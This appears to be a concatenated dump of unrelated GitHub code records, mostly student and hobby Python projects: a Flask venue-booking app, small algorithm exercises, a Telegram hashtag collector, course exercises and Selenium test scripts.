db.Column(db.String(120))\n genres = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n # done. added columns: website_link, seeking_venue, seeking_description, and relations: shows\n website_link = db.Column(db.String(120))\n seeking_venue = db.Column(db.Boolean, default=False)\n seeking_description = db.Column(db.String(120))\n shows = db.relationship('Show', backref='artist', lazy=True)\n \n def __repr__(self):\n return \"\" %(self.id, self.name)\n\n# TODO Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\n# done. Check details in each model class\n\n\nclass Show(db.Model):\n __tablename__ = 'shows'\n\n id = db.Column(db.Integer, primary_key=True)\n artist_id = db.Column(db.Integer, db.ForeignKey('artists.id'), nullable=False)\n venue_id = db.Column(db.Integer, db.ForeignKey('venues.id'), nullable=False)\n start_time = db.Column(db.DateTime, default=datetime.now(), nullable=False)\n\n def __repr__(self):\n return \"\" %(self.id, self.artist_id, self.venue_id, self.start_time)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\nfrom babel.dates import format_datetime\n\ndef format_datetime(value, format='medium'):\n # instead of just date = dateutil.parser.parse(value)\n # added if/else to handeled a datetime input\n if isinstance(value, str):\n date = dateutil.parser.parse(value)\n else:\n date = value\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format, locale='en')\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # TODO: replace with real venues data.\n # num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\n # find all city/state\n cityState = db.session.query(Venue.city, Venue.state).distinct(Venue.city, Venue.state)\n ans = [] \n for cs in cityState:\n venue_info = Venue.query.filter_by(state = cs.state).filter_by(city = cs.city).all()\n venue_detail = []\n for ven in venue_info:\n venue_detail.append({'id': ven.id, \n 'name': ven.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.venue_id == ven.id).all() )})\n ans.append( {'city': cs.city, 'state': cs.state, 'venues': venue_detail} ) \n \n return render_template('pages/venues.html', areas=ans);\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\n # seach for Hop should return \"The Musical Hop\".\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n response = {}\n search_term = request.form.get('search_term', '')\n venues = Venue.query.filter(Venue.name.ilike(\"%\" + search_term + \"%\")).all()\n data = []\n for venue in venues:\n data.append( {\"id\": venue.id, \n 'name': venue.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.venue_id == venue.id).all() )} )\n response['count'] = len(data)\n response['data'] = data\n return render_template('pages/search_venues.html', results=response, search_term=search_term)\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n # shows the venue page with the given venue_id\n # TODO: replace with real venue data from the venues table, using venue_id\n # done.\n venue = Venue.query.get(venue_id)\n genres = venue.genres.replace('{', '').replace('}', '').split(',')\n data = {\"id\": venue.id,\n \"name\": venue.name,\n \"genres\": genres,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website_link,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": [],\n \"upcoming_shows\": [],\n \"past_shows_count\": 0,\n \"upcoming_shows_count\": 0,\n }\n # past shows\n past_shows_list = []\n past_shows_db = Show.query.filter(Show.start_time < datetime.now(), Show.venue_id == venue_id).all()\n for show in past_shows_db:\n artist = Artist.query.get(show.artist_id)\n past_shows_list.append( {'artist_id': show.artist_id, 'artist_name': artist.name, 'artist_image_link': artist.image_link ,'start_time': show.start_time} )\n # future shows\n future_shows_list = []\n future_shows_db = Show.query.filter(Show.start_time >= datetime.now(), Show.venue_id == venue_id).all()\n for show in future_shows_db:\n artist = Artist.query.get(show.artist_id)\n future_shows_list.append( {'artist_id': show.artist_id, 'artist_name': artist.name, 'artist_image_link': artist.image_link ,'start_time': show.start_time} ) \n data['past_shows'] = past_shows_list\n data['upcoming_shows'] = future_shows_list\n data['past_shows_count'] = len(past_shows_list)\n data['upcoming_shows_count'] = len(future_shows_list)\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n # TODO: insert form data as a new Venue record in the db, instead\n # TODO: modify data to be the data object returned from db insertion\n # done.\n try: \n venue = Venue(name = request.form['name'],\n city = request.form['city'],\n state = request.form['state'],\n address = request.form['address'],\n phone = request.form['phone'],\n image_link = request.form['image_link'],\n facebook_link = request.form['facebook_link'],\n genres = request.form.getlist('genres'),\n website_link = request.form['website_link'],\n seeking_talent = request.form.get('seeking_talent') == 'y',\n seeking_description = request.form['seeking_description'] )\n db.session.add(venue)\n db.session.commit() \n # on successful db insert, flash success\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n # TODO: Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n # done.\n try:\n Venue.query.filter_by(id=venue_id).delete()\n db.session.commit()\n except:\n db.session.rollback()\n finally:\n db.session.close()\n\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button delete it from the db then redirect the user to the homepage\n # please check show_venue.html for details\n return render_template('pages/home.html')\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n # TODO: replace with real data returned from querying the database\n # done.\n data = Artist.query.all()\n artists = []\n for art in data:\n artists.append( {'id': art.id, 'name': art.name} )\n return render_template('pages/artists.html', artists=artists)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\n # seach for \"A\" should return \"Guns N Petals\", \"Matt Quevado\", and \"The Wild Sax Band\".\n # search for \"band\" should return \"The Wild Sax Band\".\n # done.\n response = {}\n search_term = request.form.get('search_term', '')\n artists = Artist.query.filter(Artist.name.ilike(\"%\" + search_term + \"%\")).all()\n data = []\n for artist in artists:\n data.append( {\"id\": artist.id, \n 'name': artist.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.artist_id == artist.id).all() )} )\n response['count'] = len(data)\n response['data'] = data\n return render_template('pages/search_artists.html', results=response, search_term=search_term)\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n # shows the artist page with the given artist_id\n # TODO: replace with real artist data from the artist table, using artist_id\n # done.\n data = {} \n artist = Artist.query.get(artist_id)\n genres = artist.genres.replace('{', '').replace('}', '').split(',')\n data = {\"id\": artist.id,\n \"name\": artist.name,\n \"genres\": genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website_link,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": [],\n \"upcoming_shows\": [],\n \"past_shows_count\": 0,\n \"upcoming_shows_count\": 0,\n }\n \n # past shows\n past_shows_list = []\n past_shows_db = Show.query.filter(Show.start_time < datetime.now(), Show.artist_id == artist_id).all()\n for show in past_shows_db:\n venue = Venue.query.get(show.venue_id)\n past_shows_list.append( {'venue_id': show.venue_id, 'venue_name': venue.name, 'venue_image_link': venue.image_link ,'start_time': show.start_time} )\n # future shows\n future_shows_list = []\n future_shows_db = Show.query.filter(Show.start_time >= datetime.now(), Show.artist_id == artist_id).all()\n for show in future_shows_db:\n venue = Venue.query.get(show.venue_id)\n future_shows_list.append( {'venue_id': show.venue_id, 'venue_name': venue.name, 'venue_image_link': venue.image_link ,'start_time': show.start_time} ) \n data['past_shows'] = past_shows_list\n data['upcoming_shows'] = future_shows_list\n data['past_shows_count'] = len(past_shows_list)\n data['upcoming_shows_count'] = len(future_shows_list)\n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n # TODO: populate form with fields from artist with ID \n # done.\n data = Artist.query.get(artist_id)\n artist={\n \"id\": data.id,\n \"name\": data.name,\n \"genres\": data.genres.replace('{', '').replace('}', '').split(','),\n \"city\": data.city,\n \"state\": data.state,\n \"phone\": data.phone,\n \"website\": data.website_link,\n \"facebook_link\": data.facebook_link,\n \"seeking_venue\": data.seeking_venue,\n \"seeking_description\": data.seeking_description,\n \"image_link\": data.image_link\n }\n form = ArtistForm(name=data.name,\n city=data.city,\n state=data.state,\n phone=data.phone,\n facebook_link=data.facebook_link,\n website_link=data.website_link,\n image_link=data.image_link,\n seeking_venue=data.seeking_venue,\n seeking_description=data.seeking_description)\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n # TODO: take values from the form submitted, and update existing\n # artist record with ID using the new attributes\n # done.\n try:\n artist = Artist.query.get(artist_id)\n artist.name = request.form['name']\n artist.city =request.form['city']\n artist.state = request.form['state']\n artist.phone = request.form['phone']\n artist.image_link = request.form['image_link']\n artist.facebook_link = request.form['facebook_link']\n artist.genres = request.form.getlist('genres')\n artist.website_link = request.form['website_link']\n artist.seeking_venue = request.form.get('seeking_venue') == 'y'\n artist.seeking_description = request.form['seeking_description']\n db.session.commit() \n # on successful db insert, flash success\n flash('Aritst ' + str(artist_id) + ' was successfully updated!')\n except:\n db.session.rollback()\n flash('An error occurred. Artist ' + str(artist_id) + ' could not be updated.')\n finally:\n db.session.close()\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n # TODO: populate form with values from venue with ID \n # done.\n data = Venue.query.get(venue_id)\n venue={\n \"id\": data.id,\n \"name\": data.name,\n \"genres\": data.genres.replace('{', '').replace('}', '').split(','),\n \"address\": data.address,\n \"city\": data.city,\n \"state\": data.state,\n \"phone\": data.phone,\n \"website\": data.website_link,\n \"facebook_link\": data.facebook_link,\n \"seeking_talent\": data.seeking_talent,\n \"seeking_description\": data.seeking_description,\n \"image_link\": data.image_link\n }\n form = VenueForm( name=data.name,\n city=data.city,\n state=data.state,\n address=data.address,\n phone=data.phone,\n facebook_link=data.facebook_link,\n website_link=data.website_link,\n image_link=data.image_link,\n seeking_talent=data.seeking_talent,\n seeking_description=data.seeking_description)\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n # TODO: take values from the form submitted, and update existing\n # venue record with ID using the new attributes\n # done.\n try:\n venue = Venue.query.get(venue_id)\n venue.name = request.form['name']\n venue.city =request.form['city']\n venue.state = request.form['state']\n venue.address = request.form['address']\n venue.phone = request.form['phone']\n venue.image_link = request.form['image_link']\n venue.facebook_link = request.form['facebook_link']\n venue.genres = request.form.getlist('genres')\n venue.website_link = request.form['website_link']\n venue.seeking_talent = request.form.get('seeking_talent') == 'y'\n venue.seeking_description = request.form['seeking_description']\n db.session.commit() \n # on successful db insert, flash success\n flash('Venue ' + str(venue_id) + ' was successfully updated!')\n except:\n db.session.rollback()\n flash('An error occurred. Venue ' + str(venue_id) + ' could not be updated.')\n finally:\n db.session.close()\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n # TODO: insert form data as a new Venue record in the db, instead\n # TODO: modify data to be the data object returned from db insertion\n\n try: \n artist = Artist(name = request.form['name'],\n city = request.form['city'],\n state = request.form['state'],\n phone = request.form['phone'],\n image_link = request.form['image_link'],\n facebook_link = request.form['facebook_link'],\n genres = request.form.getlist('genres'),\n website_link = request.form['website_link'],\n seeking_venue = request.form.get('seeking_venue') == 'y',\n seeking_description = request.form['seeking_description'] )\n db.session.add(artist)\n db.session.commit() \n # # on successful db insert, flash success\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows\n # TODO: replace with real venues data.\n # done.\n raw_shows = Show.query.all()\n data = []\n for show in raw_shows:\n artist = Artist.query.get(show.artist_id)\n venue = Venue.query.get(show.venue_id)\n data.append( {\"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time} )\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n # TODO: insert form data as a new Show record in the db, instead\n # done.\n try:\n show = Show( artist_id = request.form['artist_id'], \n venue_id = request.form['venue_id'], \n start_time = request.form['start_time'] )\n db.session.add(show)\n db.session.commit() \n # on successful db insert, flash success\n flash('Show was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Show could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"jinjin-liang/nd0044-project1-Fyyur","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70965189165","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 11 22:36:45 2018\n\n@author: Das\n\"\"\"\n\ndef Quicksort(arr, l, r):\n if l < r:\n pi = partition(arr, l, r)\n \n arr = Quicksort(arr, l, pi-1)\n arr = Quicksort(arr, pi+1, r)\n return arr\n \ndef partition(a, l, r):\n p = a[r]\n i = l-1\n \n for j in range(l, r):\n if a[j] <= p:\n i+=1\n a[i], a[j] = a[j], a[i]\n a[i+1], a[r] = a[r], a[i+1]\n return i+1\n \n\nprint('Enter numbers to sort separated by space:')\niput = input()\n\na = iput.split()\na = list(map(int, a))\na = Quicksort(a, 0, len(a)-1)\n\nprint(list(range(0, 6)))","repo_name":"dasaprakashk/100daysofcode","sub_path":"Divide and Conquer/Sorting/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19104980147","text":"f = open('day2-input.txt','r')\nlines = f.readlines()\nlines = [line.rstrip() for line in lines]\n\nsum = 0\nfor line in lines:\n line = list(line.split(' '))\n if(line[1] == 'Y'): \n sum += 3\n if(line[0] == 'A'): #Rock\n sum += 1\n elif(line[0] == 'B'): #Paper\n sum += 2\n else: #scissors\n sum += 3\n elif(line[1] == 'X'): \n sum += 0\n if(line[0] == 'A'): #Rock\n sum += 3\n elif(line[0] == 'B'): #Paper\n sum += 1\n else: #scissors\n sum += 2\n else: \n sum += 6\n if(line[0] == 'A'): #Rock\n sum += 2\n elif(line[0] == 'B'): #Paper\n sum += 3\n else: #scissors\n sum += 1\n\nprint(sum)\n\nf.close()","repo_name":"bergenmarshall/AdventOfCode2022","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2405774954","text":"from Carro import Carro\r\n\r\ncarro1 = Carro(\"Fiat\",\"Strada\",\"2020\",0)\r\n\r\ncarro1.ligar()\r\n\r\n# carro1.acelerar(int(input(\"Informe quanto deseja acelerar: \")))\r\n\r\n# if carro1.verificarMarcha() == False:\r\n# print(\"Baixar velocidade\")\r\n# else:\r\n# print(\"O carro está na \",carro1.verificarMarcha(), \"ª marcha\")\r\n\r\nif carro1.acelerar(int(input(\"Informe quanto deseja acelerar: \"))):\r\n print(\"Acelerou\")\r\nelse:\r\n print(\"Não acelerou\")\r\n ","repo_name":"leoncosta1980/AulasInfinity","sub_path":"Aula 12_06/mainCarro.py","file_name":"mainCarro.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73197787244","text":"import asyncio\nimport csv\nimport logging\nimport re\nfrom datetime import datetime\nfrom pathlib import Path\n\nfrom telethon import TelegramClient # type: ignore\n\nfrom common import TAG_PATTERN, SESSION_NAME, SYSTEM_VERSION\n\n_log = logging.getLogger(__name__)\n\n\ndef get_tags(channel_name: str,\n api_id: int,\n api_hash: str,\n ):\n client = TelegramClient(SESSION_NAME, api_id, api_hash, system_version=SYSTEM_VERSION)\n client.start()\n\n tags: dict = {}\n\n async def main():\n channel = await client.get_entity(channel_name)\n messages = await client.get_messages(channel, limit=None)\n for msg in messages:\n if msg.text:\n _log.debug(msg.text)\n matches = re.findall(TAG_PATTERN, msg.text)\n for tag in matches:\n tags[tag] = tags.get(tag, 0) + 1\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n\n if not tags:\n _log.warning(\"No tags collected, csv will not be created\")\n return\n\n _log.debug(tags)\n write_csv(tags)\n\n\ndef write_csv(tags: dict):\n fieldnames = [\"Tag\", \"Amount\"]\n timestamp = datetime.now().strftime(\"%d_%m_%Y__%H_%M_%S\")\n here = Path(__file__).parents[2].resolve()\n output_folder = here / 'output' / 'tags'\n tags_file = output_folder / f\"{timestamp}_tags.csv\"\n output_folder.mkdir(exist_ok=True, parents=True)\n\n with open(tags_file, 'w', newline='') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n for tag in tags:\n writer.writerow({fieldnames[0]: tag, fieldnames[1]: tags[tag]})\n","repo_name":"Cimeta/parser-example","sub_path":"src/parser/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30017438594","text":"# -*- coding: utf-8 -*-\n\"\"\"\n##################################################\n#\n# ECP 3004: Python for Business Analytics\n#\n# Name: Songjie Yin\n#\n# Date: 5/3/2021\n# \n##################################################\n#\n# Sample Script for Final Exam: \n# Module with Function Definitions\n#\n##################################################\n\"\"\"\n\n\n\n\"\"\"\n##################################################\n##################################################\n# Note: there should be no printing or calculations\n# in this script, aside from function definitions. \n# Save those for a script that you might call\n# my_midterm_tests.py (but is not graded).\n##################################################\n##################################################\n\"\"\"\n\n\n\n\n\n\n##################################################\n# Import Required Modules\n##################################################\n\n# import name_of_module\nimport math\nimport numpy as np\nfrom scipy.optimize import minimize\n\n##################################################\n# Function Definitions\n##################################################\n\n# Only function definitions here - no other calculations. \n\n# Exercise 1\n\ndef ln_check(x: float, a: float) -> float:\n \"\"\"\n \n Calculates calculates the difference between math.log(x) \n\tand some candidate value a, which is a guess of the value of math.log(x).\n \n >>> ln_check(math.exp(7), 3)\n 4.0\n >>> ln_check(math.exp(9), 4.5)\n 4.5\n >>> ln_check(math.exp(10), 10)\n 0.0\n \n \"\"\"\n ln = math.log(x)\n \n check = ln - a\n \n return check\n\n# Exercise 2\n\ndef calc_e(x_0: float, max_iter: int, tol: float) -> float:\n \"\"\"\n Preconditions: x_0, iter, tol > 0\n \n Calculates the base of the natural logarithm.\n \n >>> calc_e(2, 10, 0.001)\n 2.718281064358138\n >>> calc_e(5,20, 0.001)\n 2.718281828458728\n >>> calc_e(1, 10, 0.1)\n 2.718281064358138\n \n \"\"\"\n x = x_0\n for i in range(max_iter):\n x_next = x-x*ln_check(x, 1)\n if abs(x_next-x) float:\n \"\"\"\n Calculates the sum of squared residuals \n for the linear regression model,\n as a function of the slope coefficient only, \n concentrating out the intercept.\n \n \n >>> SSR_conc(1.0, [3, -3, 3], [1, 1, 1])\n 24.0\n >>> SSR_conc(1.0, [3, 0, 3], [0, 2, 2])\n 12.666666666666666\n >>> SSR_conc(0.5, [2, 3, 4], [1, 2, 3])\n 0.5\n \n \"\"\"\n \n y_bar = sum(y)/len(y)\n x_bar = sum(x)/len(x)\n \n beta_0 = y_bar - (x_bar * beta_1)\n \n ssr = sum((np.array(y) - beta_0 - beta_1*np.array(x))**2)\n \n return ssr\n\n# Exercise 4\n\ndef ols_slope_conc(y: np.ndarray, x: np.ndarray) -> float:\n \"\"\"\n Calculates the estimated slope coefficient \n for the linear regression model,\n by minimizing the concentrated sum of squared resduals, \n which concentrates out the intercept.\n \n >>> ols_slope_conc([2, 1, 2], [1, 0, 1])\n 1.0\n >>> ols_slope_conc([3, 4, 5], [5, 4, 3])\n -1.00000001888464\n >>> ols_slope_conc([2, 1, 0], [1, 1, 0])\n 1.500000003725291\n \n \"\"\"\n \n initial_beta_1 = 1.0\n return minimize(SSR_conc, initial_beta_1, args=(y, x)).x[0]\n\n# Only function definitions above this point. \n\n\n##################################################\n# Test the examples in your docstrings\n##################################################\n\n\n# Question 2: Test using the doctest module. \n\n\n# Make sure to include exampes in your docstrings above\n# with the proper formatting. \n\n# Test all functions with three examples each. \n# One example is already provided. \n\n# Choose good examples that will test interesting cases. \n# Make sure they all work correctly. \n\n\n# Add code so that the tests are implemented below \n# -- but only when the script is run,\n# not when it is imported. \n\nimport doctest\n\nif __name__ == \"__main__\":\n\n doctest.testmod()\n\n\n\n##################################################\n# End\n##################################################\n\n","repo_name":"Kelvin0123/SongjieYin-ECP3004S21","sub_path":"final_exam/my_final_module.py","file_name":"my_final_module.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30655579223","text":"import unittest\n\nfrom rca.programmes.utils import format_study_mode\n\n\nclass TestFormatStudyMode(unittest.TestCase):\n def test_common_last_word(self):\n study_modes = [\n \"Full-time study\",\n \"Part-time study\",\n ]\n result = format_study_mode(study_modes)\n self.assertEqual(result, \"Full-time or part-time study\")\n\n def test_different_last_word(self):\n study_modes_list = [\n [\n \"Study online\",\n \"Study on campus\",\n ],\n [\n \"Full-time\",\n \"Part-time\",\n ],\n ]\n result1 = format_study_mode(study_modes_list[0])\n self.assertEqual(result1, \"Study online or study on campus\")\n\n result2 = format_study_mode(study_modes_list[1])\n self.assertEqual(result2, \"Full-time or part-time\")\n\n def test_custom_separator(self):\n study_modes = [\n \"Option A\",\n \"Option B\",\n \"Option C\",\n ]\n result = format_study_mode(study_modes, separator=\" / \")\n self.assertEqual(result, \"Option a / option b / option c\")\n","repo_name":"torchbox/rca-wagtail-2019","sub_path":"rca/programmes/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"74083843882","text":"from panda3d.core import Vec4, Point3\n\nELEVATOR_NORMAL = 0\nELEVATOR_INT = 1\nREJECT_NOREASON = 0\nREJECT_SHUFFLE = 1\nREJECT_NOSEAT = 2\nMAX_GROUP_BOARDING_TIME = 6.0\n\nElevatorData = {ELEVATOR_NORMAL: {'openTime': 2.0,\n 'closeTime': 2.0,\n 'width': 3.5,\n 'countdown': 15.0,\n 'sfxVolume': 1.0,\n 'collRadius': 5},\n ELEVATOR_INT: {'openTime': 2.0,\n 'closeTime': 2.0,\n 'width': 3.5,\n 'countdown': 65.0,\n 'sfxVolume': 1.0,\n 'collRadius': 5}}\n\nTOON_BOARD_ELEVATOR_TIME = 1.0\nTOON_EXIT_ELEVATOR_TIME = 1.0\nTOON_VICTORY_EXIT_TIME = 1.0\nSUIT_HOLD_ELEVATOR_TIME = 1.0\nSUIT_LEAVE_ELEVATOR_TIME = 2.0\nINTERIOR_ELEVATOR_COUNTDOWN_TIME = 90\nLIGHT_OFF_COLOR = Vec4(0.5, 0.5, 0.5, 1.0)\nLIGHT_ON_COLOR = Vec4(1.0, 1.0, 1.0, 1.0)\n\nElevatorPoints = [Point3(-1.5, 5, 0.1), Point3(1.5, 5, 0.1),\n Point3(-2.5, 3, 0.1), Point3(2.5, 3, 0.1)]\n\nElevatorOutPoints = [Point3(-1.5, -5, 0), Point3(1.5, -5, 0),\n Point3(-2.5, -7, 0), Point3(2.5, -7, 0)]\n\nElevatorOutPointsFar = [Point3(-1.5, -5, 0), Point3(1.5, -5, 0),\n Point3(-2.5, -7, 0), Point3(2.5, -7, 0)]\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/cogoffice/ElevatorConstants.py","file_name":"ElevatorConstants.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"} +{"seq_id":"14331276561","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n i = -1\n total = \"\"\n carry = 0\n diff = len(a) - len(b)\n\n if diff > 0:\n b = diff * \"0\" + b\n elif diff < 0:\n a = abs(diff) * \"0\" + a\n\n while abs(i) <= len(a):\n if int(a[i]) + int(b[i]) + carry < 2:\n total = str(int(a[i]) + int(b[i]) + carry) + total\n carry = 0\n elif int(a[i]) + int(b[i]) + carry == 2:\n carry = 1\n total = \"0\" + total\n else:\n carry = 1\n total = \"1\" + total\n i -= 1\n\n if carry:\n total.replace(total[0], \"0\")\n total = \"1\" + total\n\n return total\n","repo_name":"ocan00cemal/LeetCode","sub_path":"67. Add Binary.py","file_name":"67. Add Binary.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1676480912","text":"import unittest\nfrom selenium import webdriver\nimport xlutils\nfrom xlutilis import ReadData\nfrom selenium.webdriver.common.keys import Keys\nclass Test_001(unittest.TestCase):\n @classmethod\n def setUp(self):\n self.driver=webdriver.Chrome(executable_path=\"C:\\\\Users\\\\DELL\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37\\\\chromedriver.exe\")\n @classmethod\n def tearDown(self):\n self.driver.close()\n\n def test_login_facebook(self):\n self.driver.get(\"https://www.facebook.com/login/\")\n self.driver.find_element_by_xpath(\"//*[@id='email']\").send_keys(\"mskmouni@gmail.com\")\n self.driver.find_element_by_xpath(\"//*[@id='pass']\").send_keys(\"cdsdcdsd\")\n self.driver.find_element_by_xpath(\"//*[@id='loginbutton']\").click()\n title_fb=self.driver.title\n self.assertEqual(\"test_login_facebook\",title_fb,\"title of the page is unmatched\")\n @unittest.skip(\"this is the test not ready yet\")\n def test_redbus(self):\n self.driver.get(\"https://www.redbus.in/\")\n print(self.driver.title)\n @unittest.SkipTest\n def test_opencart(self):\n self.driver.get(\"https://www.opencart.com/\")\n return self.driver.title\n\nif \"__name__\" == \"__main__\":\n unittest.main\n","repo_name":"surmetta143/pythonProject","sub_path":"Test_unit.py","file_name":"Test_unit.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37749171168","text":"import calendar\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\n\ndef getXpath(browser,tweet):\n # use JavaScript execute the code getting XPath\n xpath = browser.execute_script(\"\"\"\n function absoluteXPath(element) {\n var comp, comps = [];\n var parent = null;\n var xpath = '';\n var getPos = function(element) {\n var position = 1, curNode;\n if (element.nodeType == Node.ATTRIBUTE_NODE) {\n return null;\n }\n for (curNode = element.previousSibling; curNode; curNode = curNode.previousSibling) {\n if (curNode.nodeName == element.nodeName) {\n ++position;\n }\n }\n return position;\n };\n while (element) {\n comp = comps[comps.length] = {};\n switch (element.nodeType) {\n case Node.TEXT_NODE:\n comp.name = 'text()';\n break;\n case Node.ATTRIBUTE_NODE:\n comp.name = '@' + element.nodeName;\n break;\n default:\n comp.name = element.nodeName;\n }\n comp.position = getPos(element);\n element = element.parentNode;\n }\n for (var i = comps.length - 